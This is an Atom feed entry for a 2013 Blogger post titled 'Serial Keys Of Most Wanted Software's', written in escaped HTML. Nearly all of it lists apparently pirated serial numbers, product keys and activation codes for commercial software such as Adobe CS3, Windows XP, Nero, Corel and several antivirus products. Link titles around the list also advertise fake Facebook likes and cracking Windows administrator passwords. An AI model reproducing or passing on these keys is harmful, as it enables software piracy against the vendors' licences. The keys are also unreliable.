&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/fake-likes-for-your-facebook-post.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google Will Pay You To Travel The World&quot;&gt;&lt;strong&gt;Quick Heal Total Security version: 13.00 (6.0.0.4)&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: VNI4-GACF-2358-RSUW&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/fake-likes-for-your-facebook-post.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;About Mark Zuckerberg-Facebook Founder&quot;&gt;&lt;strong&gt;Nero 11.2.01000&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Code: 9004-0173-5M17-EU7K-KLPZ-XT4P-2MT3-4PA8&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/facebook-prank-ghost-profile.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;iPhone 5 is ‘slowest smartphone’&quot;&gt;&lt;strong&gt;FIFA 12 serials online (PC)&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;QJAA-SCPR-2XYK-X3ML-0UNL&lt;/li&gt;
&lt;li&gt;S4LU-NP8Z-GKAD-7GK2-JRLD&lt;/li&gt;
&lt;li&gt;Y7GY-CSUG-3B54-3V1N-0UNL&lt;/li&gt;
&lt;li&gt;MXMD-8GX6-23KL-Q67F-0UNL&lt;/li&gt;
&lt;li&gt;5Y9H 9GCV 6L7F 7GG4 DU6E&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/facebook-prank-ghost-profile.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How to Secure your Facebook Account&quot;&gt;&lt;strong&gt;Adobe CS3 Keygen serial number&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;&lt;b&gt;Serial Key&lt;/b&gt;:1326-0651-74702-0424-4066-8309&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Activation&lt;/b&gt; number: 3244-5309-7205-7250-5740-2918-5471&lt;/li&gt;
&lt;li&gt;Activation&amp;nbsp;type: Normal&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/facebook-prank-ghost-profile.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How to Send Friend Requests When Blocked on Facebook&quot;&gt;&lt;strong&gt;Windows XP SP2 geniune key&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Serial: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;strong&gt;&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-run-multiple-whatsapp-account-on.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Make Unlimited Free Calls&quot;&gt;SpeedUpMyPC 2013&lt;/a&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Licence Key:&lt;br /&gt;
SP-EKSPY-W97SD-VRMZN-CWM4C-MJKVH-EHAZ8&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://techdial.in/google-earth-features/http://gouravinfo.blogspot.in/2013/07/how-to-run-multiple-whatsapp-account-on.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google Earth : The 3D Enigma-Hidden Features and How To Use?&quot;&gt;&lt;strong&gt;Game Maker 6&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: E3133057BE7AD9E655FEE02F&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-run-multiple-whatsapp-account-on.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How to Crack Windows Administrator Password – Without Loosing Any Data&quot;&gt;&lt;strong&gt;WinUtilities v10.53 Professional Edition&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: WYMTGGP-7362-85FE-A519-4F96-QKWU&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-install-galaxy-s4-touchwiz.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Registration keys for some popular softwares&quot;&gt;&lt;strong&gt;Cyberlink Powerdirector 9&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Seiral: BF937-FZ7NB-KHZEY-B3LAP-BNEFL-VT3EW&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.com/&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Compress File Size From 1gb to 10mb&quot;&gt;&lt;strong&gt;Your Uninstaller Pro 7.5.2012.12 Serial&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: sharyn kolibob&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Serial: 000016-9P0U6X-N5BBFB-EH9ZTE-DEZ8P0-9U4R72-RGZ6PF-EMYUAZ-9J6XQQ-89BV1Z&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/how-to-install-galaxy-s4-touchwiz.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;How To Use Multiple Accounts of Whatsapp on a Single Android Device&quot;&gt;&lt;strong&gt;Windows 8 developer preview product key&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;6RH4V-HNTWC-JQKG8-RFR3R-36498&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/07/whatsapp-tips-and-hacks.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Donations&quot;&gt;&lt;strong&gt;PowerISO 5.4&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name: PowerISO&lt;/li&gt;
&lt;li&gt;Serial: M9PHF-E3AK2-Q166Y-DAQ1H-TVXVJ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/bumptop-make-your-desktop-3d.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Techno Affiliates&quot;&gt;&lt;strong&gt;Corel Graphic Suit X6&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;S/N: DR16R22-LZA9ZQN-6HPW8RX-6QTKYZ&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/staad-pro-2007-civil-engineering.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Contact Us&quot;&gt;&lt;strong&gt;bitdefender free edition v10oem&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Serial: 7C7CC-DCA97-71242-F0814&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.in/2013/04/make-whatsapp-lifetime-free-of-cost.html&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Google’s New Fast Internet Service For Rural Areas-”Project Loon”&quot;&gt;&lt;strong&gt;USB Disk Security v6.2.0.30 Registration name and Serial Key&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ACADEMIC&lt;/li&gt;
&lt;li&gt;18027&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ABUTTER&lt;/li&gt;
&lt;li&gt;18011&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ABRAZITE&lt;/li&gt;
&lt;li&gt;17950&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;ABRADE&lt;/li&gt;
&lt;li&gt;17875&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;WIRING&lt;/li&gt;
&lt;li&gt;17820&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 20px; margin: 0px; padding: 0px;&quot;&gt;
&lt;a href=&quot;http://gouravinfo.blogspot.com/&quot; style=&quot;color: #555555;&quot; target=&quot;_blank&quot; title=&quot;Six Things About The Man Who Leaked Iphone 4&quot;&gt;&lt;strong&gt;NovaPDF Professional Desktop v7.7.387&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;Name : Dennis Anker&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
Serial: B11F-8V0T-XRU2-Z344-4MDF-2WM5-6XEB-NHK4&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;strong&gt;PowerDVD v5.0&lt;/strong&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;S/N: MV588995988G2285&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 7px 0px;&quot;&gt;
&lt;strong&gt;Avast 5+6+7 serial ( Free )&lt;/strong&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; color: #555555; font-family: Monda, sans-serif; font-size: 13px; line-height: 23px; padding: 9px 40px;&quot;&gt;
&lt;li&gt;S/N: W6754380R9978A0910-4TZ59467&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2962856054506748830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/08/serial-keys-of-most-wanted-softwares.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2962856054506748830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2962856054506748830'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/08/serial-keys-of-most-wanted-softwares.html' title='Serial Keys Of Most Wanted Software&#39;s'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry></feed>